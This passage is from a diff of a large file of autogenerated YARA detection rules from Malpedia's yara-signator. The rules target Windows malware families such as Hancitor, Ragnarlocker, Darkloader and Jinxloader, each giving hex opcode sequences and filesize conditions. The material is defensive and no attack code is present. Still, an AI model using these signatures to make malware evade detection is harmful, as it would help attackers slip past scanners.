-		$sequence_102 = { e9???????? 83e908 74eb 2bcb 0f84fa000000 2bcb }
-		$sequence_103 = { 33d2 e8???????? 44892d???????? 33c9 44892d???????? e8???????? 488bcf }
-		$sequence_104 = { 66b90100 4889442420 e8???????? 3bc3 0f859b000000 }
-		$sequence_105 = { 5e 5b c20800 51 53 57 6884000000 }
-		$sequence_106 = { 8b442404 56 e8???????? 884604 a1???????? 83c01e 50 }
-		$sequence_107 = { 4883c12e ff15???????? 448b05???????? 488bd3 b92ab5f293 e8???????? 4885c0 }
-		$sequence_108 = { e8???????? 8945f8 85c0 0f851c050000 ff7508 }
-		$sequence_109 = { 33d2 85c0 7c12 8d0c950875be03 8b39 42 3bd0 }
-		$sequence_110 = { 8bd8 3bde 0f8559020000 e8???????? 6a18 }
-		$sequence_111 = { 0f851a020000 8b442460 3bc3 7414 8b483c 66f74401160020 7408 }
-		$sequence_112 = { 46 33048d1062be03 85ff 75cf f7d0 eb02 33c0 }
-		$sequence_113 = { 8945fc ff15???????? eb26 c745fc08000000 eb1d }
-		$sequence_114 = { 0f859d010000 e8???????? 85c0 0f849d010000 395c244c 7407 }
-		$sequence_115 = { 46 9f 64637810 705d 3d0e643f6e b974ef18f3 61 }
-		$sequence_116 = { 56 57 35fa446809 33ff 57 50 }
-		$sequence_117 = { ff75f8 56 ff15???????? 6a01 }
-		$sequence_118 = { 7420 56 ff7508 8d45e8 }
+		signator_config = "callsandjumps;datarefs;binvalue"
+		malpedia_rule_date = "20241030"
+		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
+		malpedia_version = "20241030"
+		malpedia_license = "CC BY-SA 4.0"
+		malpedia_sharing = "TLP:WHITE"
+
+	strings:
+		$sequence_0 = { 51 ff15???????? 8b3d???????? 8b1d???????? 898540ffffff be01000000 3bb540ffffff }
+		$sequence_1 = { 8d8d68ffffff ff15???????? 8d8d68ffffff 51 e8???????? 8bd0 8d8d54ffffff }
+		$sequence_2 = { 6a00 51 8bf0 ff15???????? 50 56 6a00 }
+		$sequence_3 = { 898578ffffff c78570ffffff08000000 8d9570ffffff 8d4dac ff15???????? 8d4d8c 51 }
+		$sequence_4 = { 68???????? ff15???????? 8bd0 8d4dd8 ff15???????? 50 8b4ddc }
+		$sequence_5 = { 50 8d8da0feffff 51 ff15???????? 50 8d9520feffff 52 }
+		$sequence_6 = { 8d4dd4 ff15???????? 8b55cc 89951cffffff c745cc00000000 }
+		$sequence_7 = { 8d4da4 898de8feffff eb09 8d55a4 8995e8feffff 8b85e8feffff 8b08 }
+		$sequence_8 = { 53 56 57 8965f4 c745f8???????? 8b5d08 33ff }
+		$sequence_9 = { 50 c78558ffffff80514000 899d50ffffff ffd7 8d8d50ffffff 50 8d5580 }
 
 	condition:
-		7 of them and filesize < 802816
+		7 of them and filesize < 622592
 }
-rule MALPEDIA_Win_Colony_Auto : FILE
+rule MALPEDIA_Win_Darkloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "742a0cb8-c4dd-5eda-a40e-a63b7bd8505f"
+		id = "c6586d19-c9dc-5391-af52-9dc3a3375338"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.colony"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.colony_auto.yar#L1-L235"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.darkloader_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "3b9749137439fa6695b6427d299f35f295a8c9c596ab6c8986a3096d5875940b"
+		logic_hash = "80ad8615edb3b8dd04cf4b30a3f3c46ec7df78cf02d75573629255acdb077233"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -133312,46 +133754,32 @@ rule MALPEDIA_Win_Colony_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33c0 5e c3 f30f7e05???????? 660fd606 }
-		$sequence_1 = { 740f 0301 eb0b a801 }
-		$sequence_2 = { 5b c3 b901000000 66894808 }
-		$sequence_3 = { 7407 b901000000 eb0a 33c9 803f01 0f95c1 33c0 }
-		$sequence_4 = { 8b00 83f801 7e5c f7420400080000 }
-		$sequence_5 = { 33c0 5b 8be5 5d c3 8b5df8 8b4b18 }
-		$sequence_6 = { 33c0 5e 5d c3 8b4d0c 85c9 7e0c }
-		$sequence_7 = { 0f95c0 33cd 5e 48 }
-		$sequence_8 = { 0bc1 894204 8b4510 c1e810 }
-		$sequence_9 = { 660f6e4104 f30fe6c0 84c0 7509 f30f1009 0f5ac9 }
-		$sequence_10 = { 8a4203 8841fe 8a4202 8841ff 8b02 c1e808 8801 }
-		$sequence_11 = { 0bc1 8907 8b4b04 8bc1 }
-		$sequence_12 = { 0bc1 8902 8b4508 c1e810 25ff000000 }
-		$sequence_13 = { 8b420c 2b4208 660f6ec0 f30fe6c0 }
-		$sequence_14 = { 69d200008f04 2bc8 c1e910 69c161a4f778 2bd0 }
-		$sequence_15 = { 0bc1 894704 8b4b08 8bc1 }
-		$sequence_16 = { 488364243000 8364242800 41b803000000 488d0d308e0000 4533c9 }
-		$sequence_17 = { 4152 4153 4154 4155 4156 4157 9c }
-		$sequence_18 = { f0ff00 488d4128 41b806000000 488d1588fd0000 483950f0 740b 488b10 }
-		$sequence_19 = { 488d15c1980000 483305???????? 488bcb 488905???????? ff15???????? 488d15c3980000 483305???????? }
-		$sequence_20 = { 488d05a5f20000 483bc8 772b 0fba71180f }
-		$sequence_21 = { 488905???????? ff15???????? 483305???????? 488d1546980000 }
-		$sequence_22 = { 4863442450 483bc7 0f8cddfeffff 418bc4 ba0d000000 4c8d0da0d20000 412bc6 }
-		$sequence_23 = { c70009000000 e8???????? 4883c8ff 4883c428 c3 4863d1 4c8d0546cc0000 }
+		$sequence_0 = { a5 a5 a5 a4 33f6 85ed }
+		$sequence_1 = { 8b4c2410 c6040b25 0fb6043e c1e804 8a440414 }
+		$sequence_2 = { 2bce 741d 803c3a5c 7504 }
+		$sequence_3 = { 880416 42 3b5510 7cf4 5e 5d }
+		$sequence_4 = { 50 ff15???????? 56 ff15???????? 8b35???????? 8d4508 }
+		$sequence_5 = { 68???????? eb38 8d042f 50 e8???????? }
+		$sequence_6 = { 88040a 41 84c0 75f6 ff742410 46 83ef80 }
+		$sequence_7 = { 8b442418 8b7c2414 ff7024 55 }
+		$sequence_8 = { 46 3bf5 7c8e 5f }
+		$sequence_9 = { a3???????? 5e c3 55 8bec 81ec04040000 33c9 }
 
 	condition:
-		7 of them and filesize < 7599104
+		7 of them and filesize < 124928
 }
-rule MALPEDIA_Win_Crylocker_Auto : FILE
+rule MALPEDIA_Win_Spaceship_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2b5ef66c-1ec0-5c10-8396-507384c0e395"
+		id = "cf82a1e6-2655-5412-8f93-024883bc5cc4"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.crylocker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.crylocker_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spaceship"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.spaceship_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "d90969734d25e11d990569603034674764175d320f05923dcd1a4fc7e127f4a1"
+		logic_hash = "c325451a252fdb438f6f512d14d550b1461b33c1e3170612d6dfec64ac9a2b26"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -133365,34 +133793,34 @@ rule MALPEDIA_Win_Crylocker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 52 53 57 68???????? 8bf0 e8???????? }
-		$sequence_1 = { 89442420 ff15???????? 837c243400 8bf0 0f86fd000000 }
-		$sequence_2 = { 57 e9???????? e8???????? 85c0 7458 }
-		$sequence_3 = { 8d442424 50 895c2424 895c2420 895c2428 }
-		$sequence_4 = { 83c440 8d0c24 68???????? 51 }
-		$sequence_5 = { 52 8d442424 50 e8???????? 8d4c241c }
-		$sequence_6 = { 56 50 33db e8???????? 8d4c240c 68???????? }
-		$sequence_7 = { e8???????? 8b4c2478 8b542474 51 52 8d442424 50 }
-		$sequence_8 = { 0f94c1 8d0c8d01000000 51 52 }
-		$sequence_9 = { ffd5 66833c467c 0f8487000000 66833f21 752a 57 ffd5 }
+		$sequence_0 = { 8bc1 8bf7 8bfa c1e902 f3a5 8bc8 6a22 }
+		$sequence_1 = { 2bf9 8bc1 8bf7 8bfa 8b94245c090000 c1e902 }
+		$sequence_2 = { 58 c3 33c0 c3 6800000300 }
+		$sequence_3 = { 0bc1 8d0c40 894c2428 e8???????? 8b442424 8b0d???????? 56 }
+		$sequence_4 = { f3a4 8d4c240c 51 e8???????? 83c408 85c0 0f84d7000000 }
+		$sequence_5 = { 66899c24d6030000 c78424d803000080684100 66c78424dc0300001a00 66899424de030000 c78424e003000078684100 }
+		$sequence_6 = { 8d8c2410020000 68ac5d0000 51 68???????? 68???????? }
+		$sequence_7 = { 85c0 741a 8078ff3a 7506 c6400100 eb03 }
+		$sequence_8 = { 8bc2 83e103 f3a4 5f 5e 81c40c010000 c3 }
+		$sequence_9 = { f2ae f7d1 2bf9 8bc1 8bf7 8bfa 8b942470060000 }
 
 	condition:
-		7 of them and filesize < 139264
+		7 of them and filesize < 262144
 }
-rule MALPEDIA_Win_Rdat_Auto : FILE
+rule MALPEDIA_Win_Sunorcal_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c05f84d4-de9e-5fb2-ae60-330892f73174"
+		id = "a8968f16-8557-51ad-9926-5303f4012f89"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rdat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rdat_auto.yar#L1-L159"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sunorcal"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sunorcal_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "2e9377d4369bfead5bccbe7fe48c6c763a624a3a6df0438cb4949c8e1a10afb4"
-		score = 60
-		quality = 45
+		logic_hash = "7356cfcbffaef559e7c55d9c230d0091548077f346f07c94d1eede7494054ef4"
+		score = 75
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -133404,38 +133832,32 @@ rule MALPEDIA_Win_Rdat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4c8bc3 4c0f42c7 4d85c0 7504 }
-		$sequence_1 = { 4c8b4548 4d85c0 0f84db000000 4885c0 0f84d2000000 }
-		$sequence_2 = { 4898 4885c0 751e 483bfb }
-		$sequence_3 = { 498b4638 498b1c04 4885db 0f843f010000 }
-		$sequence_4 = { 4863ca 418907 33c0 448b5770 }
-		$sequence_5 = { 25ffffff0f 743d 83e801 7427 }
-		$sequence_6 = { 4883cbff 6690 48ffc3 4038341a 75f7 4883791810 488b7910 }
-		$sequence_7 = { 48895808 48896810 48897018 488bf2 4c8bf9 }
-		$sequence_8 = { 75f7 4883791810 488b7910 7203 488b09 483bfb 4c8bc3 }
-		$sequence_9 = { 4e8b44c8f8 7816 8d4a01 4d8b4008 }
-		$sequence_10 = { 85c0 740b b9e8030000 ff15???????? }
-		$sequence_11 = { 25ffffff0f 4c8bc1 83f803 0f85b2000000 488b01 }
-		$sequence_12 = { 4883c504 453bc4 7358 e9???????? }
-		$sequence_13 = { 746c 4883ff01 7266 498bde 48833d????????10 480f431d???????? }
-		$sequence_14 = { 488d0cc0 4863c2 4803c8 420fb6940980360200 }
-		$sequence_15 = { 488d95e8010000 488d8d68010000 e8???????? 90 488d9568010000 4883bd8001000010 }
+		$sequence_0 = { 6a03 e8???????? cc 55 8bec 83ec0c }
+		$sequence_1 = { 5b c21000 8b442404 8b00 }
+		$sequence_2 = { 7c02 eb0e e8???????? e8???????? 85c0 }
+		$sequence_3 = { 5b c21000 8b442404 8b00 813863736de0 752a }
+		$sequence_4 = { 5b c21000 8b442404 8b00 813863736de0 752a 83781003 }
+		$sequence_5 = { 5e 5b c21000 8b442404 8b00 813863736de0 752a }
+		$sequence_6 = { eb0e e8???????? e8???????? 85c0 }
+		$sequence_7 = { 50 6a00 ff15???????? 6800040000 e8???????? }
+		$sequence_8 = { ff15???????? 68b7000000 ff15???????? 6a64 68???????? }
+		$sequence_9 = { c21000 8b442404 8b00 813863736de0 752a 83781003 }
 
 	condition:
-		7 of them and filesize < 1573888
+		7 of them and filesize < 172032
 }
-rule MALPEDIA_Win_Jinxloader_Auto : FILE
+rule MALPEDIA_Win_Sathurbot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "cb454fe4-e9ad-5069-aba0-8fdb369e6db4"
+		id = "55b56bcd-97b3-557a-80fc-a30a2a5d5f93"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jinxloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.jinxloader_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sathurbot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sathurbot_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "c58b02af334fd67d7a0c2822fadcfa6594a39ce2fb1e10101df77761efab8668"
+		logic_hash = "516fbdaf796971a35966077b409dae2049cf7a15611af7b3fda85f6cf94f88db"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -133449,32 +133871,32 @@ rule MALPEDIA_Win_Jinxloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? e8???????? e8???????? 488b442450 6690 e8???????? 488d0529305400 }
-		$sequence_1 = { 4d09c4 4921d3 4d09cb 4c21d2 4809c2 90 48894c2420 }
-		$sequence_2 = { eb0a 488b4c2470 488b5c2460 488b9424e8000000 48899a80020000 833d????????00 7413 }
-		$sequence_3 = { eb1d 440fb64c3419 4129d1 418d5121 88543c19 418d5021 88543419 }
-		$sequence_4 = { 84c9 740d b802000000 31db 4883c420 5d c3 }
-		$sequence_5 = { eb12 4531e4 31ff 4531ed eb08 4531e4 31ff }
-		$sequence_6 = { e9???????? 4889d9 6690 e8???????? 440f117c2460 440f117c2470 488d1568010000 }
-		$sequence_7 = { e9???????? 90 488dbc24e0000000 488d7fe0 0f1f8000000000 48896c24f0 488d6c24f0 }
-		$sequence_8 = { e8???????? 488b8c24b8000000 49890b 488b9424c0000000 49895308 48894818 48895020 }
-		$sequence_9 = { e8???????? 4883c418 5d c3 4889442428 488d0582005500 6690 }
+		$sequence_0 = { f6c101 0f94c0 813d????????0a000000 0f9cc1 08c1 b8f90f07b5 b94cba8e03 }
+		$sequence_1 = { eb13 8a55fa 8a75fb 08d6 f6c601 be09a730d3 0f45f1 }
+		$sequence_2 = { f6c101 0f94c0 813d????????0a000000 0f9cc1 08c1 b8fb0334f5 b995c6f26e }
+		$sequence_3 = { f6c101 0f94c0 813d????????0a000000 0f9cc1 08c1 b8d60de432 b9dc519a31 }
+		$sequence_4 = { f6c101 0f94c0 813d????????0a000000 0f9cc1 08c1 b88c88bb32 b93cd77390 }
+		$sequence_5 = { c744240400000000 ff15???????? 83ec18 8945e4 837de400 0f9545eb a1???????? }
+		$sequence_6 = { b8a152f86d b9518159e1 0f45c1 b9a152f86d bac9ebae71 0f45ca bf7994f31d }
+		$sequence_7 = { eb02 31d2 83f90a 7c0f 8d48ff 0fafc8 83e101 }
+		$sequence_8 = { f6c101 0f94c0 813d????????0a000000 0f9cc1 08c1 b8eab7bd0b b966078151 }
+		$sequence_9 = { e9???????? 81fe4cc3b5b8 89f3 0f852cfeffff 8b5c240c e9???????? 81fe45dc43a2 }
 
 	condition:
-		7 of them and filesize < 20364288
+		7 of them and filesize < 2727936
 }
-rule MALPEDIA_Win_Maggie_Auto : FILE
+rule MALPEDIA_Win_Ksl0T_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0ba792f1-dd78-5b98-8593-543560b6dc1a"
+		id = "a3ab9e8a-b9b1-5fdf-a960-56956519148f"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.maggie"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.maggie_auto.yar#L1-L115"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ksl0t"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ksl0t_auto.yar#L1-L171"
 		license_url = "N/A"
-		logic_hash = "f79cbc6ae2d70c9e6484e5066353afb6506cea51f8ea75e10ee4458493abfd34"
+		logic_hash = "e91b3156f2e9e5f9c8a906372d50f3aa236f543969f133a16425c0f118830109"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -133488,32 +133910,38 @@ rule MALPEDIA_Win_Maggie_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7511 ff15???????? 85c0 7407 33c0 e9???????? }
-		$sequence_1 = { 663b05???????? 7505 e8???????? e8???????? }
-		$sequence_2 = { 663b05???????? 7505 e8???????? e8???????? 84c0 }
-		$sequence_3 = { 83f8ff 750f ff15???????? 2d33270000 f7d8 }
-		$sequence_4 = { 750f ff15???????? 2d33270000 f7d8 }
-		$sequence_5 = { ff15???????? 83f8ff 750f ff15???????? 2d33270000 f7d8 }
-		$sequence_6 = { 83f8ff 750f ff15???????? 2d33270000 f7d8 1bc0 }
-		$sequence_7 = { ff15???????? 83f8ff 750f ff15???????? 2d33270000 }
-		$sequence_8 = { 750f ff15???????? 2d33270000 f7d8 1bc0 }
-		$sequence_9 = { b8ff000000 663b05???????? 7505 e8???????? e8???????? }
+		$sequence_0 = { e8???????? b9ff000000 e8???????? 488bfb 4803ff 4c8d2df17a0000 }
+		$sequence_1 = { 85c0 741d 8b54240c 52 8d442404 50 ff15???????? }
+		$sequence_2 = { ff15???????? 8d9500090000 52 ff15???????? 03c0 50 }
+		$sequence_3 = { 57 8b55dc 52 ff15???????? 57 }
+		$sequence_4 = { 8d8d60060000 51 ff15???????? e9???????? }
+		$sequence_5 = { c68424f900000002 c68424fa00000055 c644245813 c64424593c c644245a3b c644245b31 c644245c13 }
+		$sequence_6 = { 448b8424a4140000 488d1586d20000 488d8c24a0100000 ff15???????? eb4e 66ba5c00 }
+		$sequence_7 = { 8d45f0 64a300000000 8965e8 c745fc00000000 6a01 }
+		$sequence_8 = { 8bac2438030000 b23a 56 b321 8bf1 }
+		$sequence_9 = { c68424090300003a c684240a03000006 c684240b0300002c c684240c03000026 c684240d03000021 }
+		$sequence_10 = { 488d8c24b0030000 e8???????? ba0f000000 488d8c2480010000 e8???????? }
+		$sequence_11 = { 488d0d47e30000 ff15???????? e9???????? 488d1575c00000 4881c25c010000 41b804000000 }
+		$sequence_12 = { 72f3 33c0 90 308c048c000000 40 83f80c }
+		$sequence_13 = { c684242602000036 c684242702000014 c684242802000031 c684242902000031 }
+		$sequence_14 = { 0f8557ffffff b928000000 bf???????? bb???????? bd???????? b8???????? 2bf9 }
+		$sequence_15 = { c684249201000030 c68424930100003b c684249401000018 c684249501000020 c684249601000021 }
 
 	condition:
-		7 of them and filesize < 611328
+		7 of them and filesize < 196608
 }
-rule MALPEDIA_Win_Tigerlite_Auto : FILE
+rule MALPEDIA_Win_Fusiondrive_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2f8f693e-a8e1-5528-af21-1e49257d2d13"
+		id = "6b24ebb4-bf8c-5059-8d46-133c8671d36b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tigerlite"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.tigerlite_auto.yar#L1-L174"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fusiondrive"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.fusiondrive_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "97a4326cdfea07521b42c0aaec8304cc4bf3187afbba14d3d8ecb63bd75d0ec6"
+		logic_hash = "21ef3d5712d10364f2b0ca6cdaf9dc2adad20cae2472f23d5b6b628fa15a50bd"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -133527,40 +133955,34 @@ rule MALPEDIA_Win_Tigerlite_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 754a 488d0d2b4a0000 e8???????? 488d15fb130100 488d0dd4130100 e8???????? }
-		$sequence_1 = { 488bd8 e8???????? 488bcb ff15???????? 488bcb 488bf8 e8???????? }
-		$sequence_2 = { eb0f 8b45f4 8b0485489d4100 804c180402 }
-		$sequence_3 = { 48890d???????? 488905???????? 488d0517410000 48890d???????? 488905???????? }
-		$sequence_4 = { 83e11f c1e106 8b0485489d4100 80640804fe ff15???????? 50 }
-		$sequence_5 = { 488bd7 ff15???????? 83f8ff 0f8465020000 488d4c2451 33d2 41b8ff030000 }
-		$sequence_6 = { 33c5 8945fc 53 56 8d85a4faffff 57 50 }
-		$sequence_7 = { 2b349d489d4100 c1fe06 8bc3 c1e005 03f0 8975e4 }
-		$sequence_8 = { 33c0 c644244000 3905???????? 89442441 750b }
-		$sequence_9 = { 488d15bfd20000 483305???????? 488bcb 488905???????? ff15???????? 488d15b9d20000 }
-		$sequence_10 = { 6a20 8bfa 8bf1 f30f7f45e9 }
-		$sequence_11 = { 7e32 0fb617 0fb64701 83e203 c1e804 03d2 }
-		$sequence_12 = { 56 33f6 ffb644854100 ff15???????? 898644854100 83c604 }
-		$sequence_13 = { 7405 b9???????? e8???????? 833d????????06 750c eb27 c705????????00000000 }
-		$sequence_14 = { 488d542430 6689442420 0fb605???????? 4d8bf9 88442422 8b05???????? }
-		$sequence_15 = { 4863c2 4863c9 488d14c8 420fbe940ab0730100 }
+		$sequence_0 = { 498bca e8???????? 90 4983fd08 7231 4a8d146d02000000 }
+		$sequence_1 = { 4883c420 5b c3 4883611000 488d05e8b50000 48894108 }
+		$sequence_2 = { 488d150b760100 488d4c2420 e8???????? cc 48895c2420 55 }
+		$sequence_3 = { 4c8d34c0 4a8b84e120e00100 4a8b44f028 488945b7 ff15???????? 33d2 }
+		$sequence_4 = { 4488742470 eb22 488d3da7290100 eb19 }
+		$sequence_5 = { 488b05???????? 483b4208 7520 488bc1 4883c110 33d2 4885c0 }
+		$sequence_6 = { 33d2 33c9 ff15???????? 488d0da0620100 eb0c 83f901 750d }
+		$sequence_7 = { 400fb6c7 488b8da0010000 4833cc e8???????? }
+		$sequence_8 = { 488d442470 4889442428 897c2420 4533c9 }
+		$sequence_9 = { 498784f7e8d90100 4883c504 493bec e9???????? 488bc3 4c8d3d2792ffff 498784f7e8d90100 }
 
 	condition:
-		7 of them and filesize < 349184
+		7 of them and filesize < 290816
 }
-rule MALPEDIA_Win_Tflower_Auto : FILE
+rule MALPEDIA_Win_Hancitor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "656aa3e8-bdba-5aaa-91e7-d2cae80667fc"
+		id = "1eb6df2e-159b-5f28-b4bd-8814d0819600"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tflower"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.tflower_auto.yar#L1-L155"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hancitor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hancitor_auto.yar#L1-L262"
 		license_url = "N/A"
-		logic_hash = "5567cb36102c74631716b6bc2ab76355b3e5f81ea5dbfa12803ccef6f940b1df"
+		logic_hash = "065eca202c5de0c3aac505b9a1e3b15150d867b922d1e944cb9db0f3b78d775f"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -133572,38 +133994,49 @@ rule MALPEDIA_Win_Tflower_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0001 0200 0103 0303 }
-		$sequence_1 = { 0001 7708 00f3 7608 }
-		$sequence_2 = { 0002 7408 00f7 7308 }
-		$sequence_3 = { c1e810 8bcb c1e918 0fb6c0 8b0c8dc0064f00 330c85c0024f00 }
-		$sequence_4 = { 0008 7408 0002 7408 }
-		$sequence_5 = { 0beb 33ff 8b1c8d48fa4e00 8b4c2418 }
-		$sequence_6 = { 000f 7708 0001 7708 }
-		$sequence_7 = { 0bc8 51 e8???????? 83c404 8906 8d4df4 }
-		$sequence_8 = { 0010 740b 0021 740b }
-		$sequence_9 = { 8bcb c1e910 0fb6d1 8b349510674f00 }
-		$sequence_10 = { 001a 0c05 003c0c 05004e0c05 }
-		$sequence_11 = { 0fb64802 8d41ff 83f87f 0f8791000000 0fb680180e4900 ff2485f40d4900 68???????? }
-		$sequence_12 = { 50 6a00 6a00 8d85f0fcffff }
-		$sequence_13 = { 3304bd20d14e00 8b7c243c 8b542420 c1ea18 3304bd20c94e00 8b7c2448 }
-		$sequence_14 = { c1e810 0fb6c0 8b0c8520e54e00 8b44242c }
-		$sequence_15 = { 000b 8605???????? 007885 0500788605 }
+		$sequence_0 = { 6a00 6824040000 6a00 6a00 6a00 }
+		$sequence_1 = { 6800010000 6a40 68???????? e8???????? }
+		$sequence_2 = { 750d e8???????? 83c010 a3???????? }
+		$sequence_3 = { 6a20 68???????? 68???????? e8???????? 83c410 }
+		$sequence_4 = { 55 8bec 81ec58010000 6a44 }
+		$sequence_5 = { c745fc00000000 b901000000 85c9 7448 }
+		$sequence_6 = { 83f801 750e 57 ff15???????? 8bd8 }
+		$sequence_7 = { 8945f4 8b4df8 8b5154 52 8b4508 }
+		$sequence_8 = { a1???????? 85c0 740c ff7508 }
+		$sequence_9 = { 83f941 72ed 881d???????? c705????????01000000 }
+		$sequence_10 = { 6b55fc28 8b45f4 8b4d08 034c1014 51 6b55fc28 8b45f4 }
+		$sequence_11 = { 55 8bec 8b4d08 6a00 6a01 51 }
+		$sequence_12 = { 55 8bec a1???????? 0b05???????? 7510 }
+		$sequence_13 = { 0fb708 81e100f00000 c1f90c 66894dfc 0fb755fc 83fa03 }
+		$sequence_14 = { e8???????? 83c404 8b550c 8902 b801000000 }
+		$sequence_15 = { c60600 ff15???????? 8b3d???????? 85c0 740a }
+		$sequence_16 = { 53 56 57 8b483c 33f6 03c8 }
+		$sequence_17 = { 6bc800 8b5508 0fbe040a 8945fc 8b4dfc 83e962 894dfc }
+		$sequence_18 = { 8b413c 8b440828 03c1 ffd0 33c0 }
+		$sequence_19 = { f8 d1683a 55 08709e 891f }
+		$sequence_20 = { 05c8e40a00 8945dc 817d88dab21701 7508 8b458c 2b4588 }
+		$sequence_21 = { a1???????? 83c05b a3???????? a1???????? 0345cc a3???????? 817df8b07d0900 }
+		$sequence_22 = { 0f8d7f010000 8b45c4 0345cc 8945c4 8b45cc 0345e4 8945cc }
+		$sequence_23 = { 83e803 8945b4 eb22 833d????????00 7414 8b45e4 }
+		$sequence_24 = { 2b4588 ffd0 ebc9 a1???????? 8945b4 a1???????? 83c044 }
+		$sequence_25 = { 8b45a0 05c8d45566 7440 c745880a000000 eb07 8b4588 }
+		$sequence_26 = { 55 8bec 83ec78 a1???????? a3???????? c745c488b24000 a1???????? }
 
 	condition:
-		7 of them and filesize < 6578176
+		7 of them and filesize < 106496
 }
-rule MALPEDIA_Win_Krbanker_Auto : FILE
+rule MALPEDIA_Win_Ragnarlocker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9a0cf891-270c-5b18-9c0c-11605a809801"
+		id = "2ac8a2eb-b248-5587-8704-788c5b75f23d"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.krbanker"
